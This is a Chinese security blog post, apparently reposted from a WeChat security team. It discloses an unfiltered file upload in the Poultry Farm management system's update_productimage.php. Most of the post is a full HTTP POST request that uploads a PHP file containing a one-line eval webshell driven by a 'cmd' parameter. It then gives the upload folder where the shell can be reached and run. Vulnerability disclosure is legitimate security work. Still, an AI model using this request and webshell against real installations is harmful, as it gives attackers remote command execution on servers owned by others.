​Poultry Farm管理系统update_productimage.php 处存在任意文件上传

admin 2024年8月14日23:03:05评论32 views字数 1318阅读4分23秒阅读模式

1. 源码文件

/farm/update_productimage.php

​Poultry Farm管理系统update_productimage.php 处存在任意文件上传

    在源码中可以观察到,后端处理上传文件时,并未对$image=$_FILES["imagename"]["name"];做任何过滤,从而导致任意文件上传。具体逻辑和product.php中一致)

2. 漏洞复现

POST /RedcockFarm/farm/update_productimage.php?imageid=3 HTTP/1.1Host: 192.168.70.139Content-Length: 313Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.70.139Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6wpWB1MBCI6oPxFDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://192.168.70.139/RedcockFarm/farm/update_productimage.php?imageid=3Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8gjigr0om5m6aaqh840mch8ieaConnection: close------WebKitFormBoundary6wpWB1MBCI6oPxFDContent-Disposition: form-data; name="imagename"; filename="index.php"Content-Type: image/jpeg<?php @eval($_REQUEST['cmd']);?>------WebKitFormBoundary6wpWB1MBCI6oPxFDContent-Disposition: form-data; name="submit"------WebKitFormBoundary6wpWB1MBCI6oPxFD--

​Poultry Farm管理系统update_productimage.php 处存在任意文件上传

成功上传后,根据源码可知,文件被传送到了productimages/文件夹下(这是个坑,因为感觉原作者代码编写问题,文件上传路径并未统一,在项目根目录下并不存在这个文件夹),访问相对路径,查看文件是否能够被成功解析。

​Poultry Farm管理系统update_productimage.php 处存在任意文件上传

原文始发于微信公众号(蟹堡安全团队):​Poultry Farm管理系统update_productimage.php 处存在任意文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月14日23:03:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ​Poultry Farm管理系统update_productimage.php 处存在任意文件上传https://cn-sec.com/archives/3064907.html

发表评论

匿名网友 填写信息